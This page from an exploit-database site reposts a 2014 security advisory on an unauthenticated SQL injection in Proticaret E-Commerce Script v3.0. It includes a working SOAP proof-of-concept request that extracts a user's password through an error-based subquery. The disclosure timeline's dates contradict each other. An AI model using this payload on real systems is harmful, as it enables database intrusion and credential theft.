0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Proticaret E-Commerce Script 3.0 - SQL Injection Vulnerability
Document Title: ============ Proticaret E-Commerce Script v3.0 >= SQL Injection Release Date: =========== 13 Nov 2014 Product & Service Introduction: ======================== Proticaret is a free e-commerce script. Abstract Advisory Information: ======================= BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0 Vulnerability Disclosure Timeline: ========================= 20 Oct 2014 : Contact with Vendor 20 Nov 2014 : Vendor Response June 26, 2014 : Patch Released 13 Nov 2014 : Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Promist Bilgi İletişim Teknolojileri A.Ş Product: Proticaret E-commerce Script v3.0 >= Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== Critical Technical Details & Description: ======================== SQL Injection Proof of Concept (PoC): ================== Proof of Concept Request: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <tem:GetProductCodes> <!--Optional:--> <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code> <!--Optional:--> <tem:StartWith>?</tem:StartWith> </tem:GetProductCodes> </soapenv:Body> </soapenv:Envelope> Response: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int. at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) at System.Data.SqlClient.SqlDataReader.Read() at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) --- End of inner exception stack trace ---</faultstring> <detail/> </soap:Fault> </soap:Body> </soap:Envelope> Solution Fix & Patch: ================ Apply the patch for v3.0 Security Risk: ========== The risk of the vulnerabilities above estimated as critical. Credits & Authors: ============== Bilgi Güvenliği Akademisi Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. # 0day.today [2024-07-08] #